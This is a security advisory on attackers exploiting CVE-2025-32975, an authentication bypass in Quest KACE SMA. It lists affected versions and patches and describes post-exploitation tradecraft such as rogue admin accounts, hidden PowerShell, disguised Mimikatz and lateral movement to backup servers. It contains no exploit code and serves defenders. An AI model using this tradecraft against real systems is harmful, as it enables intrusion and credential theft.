What is CVE-2025-32975?

It is a critical authentication bypass vulnerability in the Quest KACE SMA Single Sign-On mechanism that allows attackers to gain full administrative control.

Which Quest KACE SMA versions are affected?

Affected versions include 13.0.x, 13.1.x, 13.2.x, 14.0.x, and 14.1.x prior to the specific security patches released in May 2025.

How do attackers maintain persistence after exploitation?

Attackers create new administrative accounts like ooo1 and ooo2, run hidden PowerShell scripts, and modify registry keys.

What systems are targeted for lateral movement?

Threat actors have been observed moving laterally to domain controllers and backup infrastructure such as Veeam and Veritas.

How can organizations remediate this threat?

Organizations should update to the latest fixed firmware and remove KACE SMA instances from the public internet, restricting access via VPN.

Attack

Attackers Exploit Critical Quest KACE SMA Authentication Bypass

published: March 20, 2026

Take action: If you are using Quest KACE SMA, this is urgent. Make sure your Quest KACE SMA is off the public internet and behind a VPN immediately. Check your logs for new unknown admin accounts, as these are signs that attackers have already taken over your management system. Then patch ASAP.

Learn More

Arctic Wolf researchers report malicious activity targeting Quest KACE Systems Management Appliance (SMA) instances starting the week of March 9, 2026. Quest KACE SMA is an on-premises tool used for centralized endpoint management, software deployment, and patching.

The attacks exploit a critical authentication bypass vulnerability that was originally patched in May 2025 but remains a threat to unpatched, internet-facing systems. Attackers are looking for publicly exposed instances to gain an initial foothold into corporate networks.

The exploited flaw is tracked as CVE-2025-32975 (CVSS score 9.8) - An authentication bypass vulnerability in the Single Sign-On (SSO) handling mechanism. Attackers exploit this flaw by bypassing credential checks to gain full administrative control. This allows them to run arbitrary commands through the KPluginRunProcess function and deploy malicious payloads.

Quest patched the following flaws in the same patch cycle:

CVE-2025-32976 - Unauthorized system access.
CVE-2025-32977 - Remote access vulnerability.
CVE-2025-32978 - Privilege escalation flaw.

After gaining administrative access, attackers establish persistence by creating new accounts such as "ooo1" and "ooo2" using the runkbot.exe process. They also run hidden PowerShell scripts and modify registry keys to maintain their presence on the network. Attackers use tools like Mimikatz, often disguised as asd.exe, to harvest credentials and move laterally to critical systems.

The vulnerability affects multiple versions of the Quest KACE SMA platform:

Organizations running version 13.0.x before 13.0.385 or 13.1.x before 13.1.81 are vulnerable to these attacks.
Other affected versions include 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4).

Quest has released fixed firmware for all these branches, and administrators should verify their current version immediately.

Organizations should update their Quest KACE SMA instances to the latest fixed versions, such as 14.1.101 (Patch 4) ASAP. Administrators should check if these appliances are isolated from the public internet and restrict access through a VPN or firewall.

It is important to audit system logs for Base64-encoded payloads and check for unauthorized administrative accounts or unusual RDP connections to backup servers.

Attackers Exploit Critical Quest KACE SMA Authentication Bypass

Read More
Amazon Q developer extension for VS Code compromised, …
Two Google Pixel Android flaws actively exploited
Hunk Companion WordPress plugin exploited by hackers to …
Hackers exploit XSS flaw in Roundcube to steal …
Critical privilege escalation flaw in King Addons for …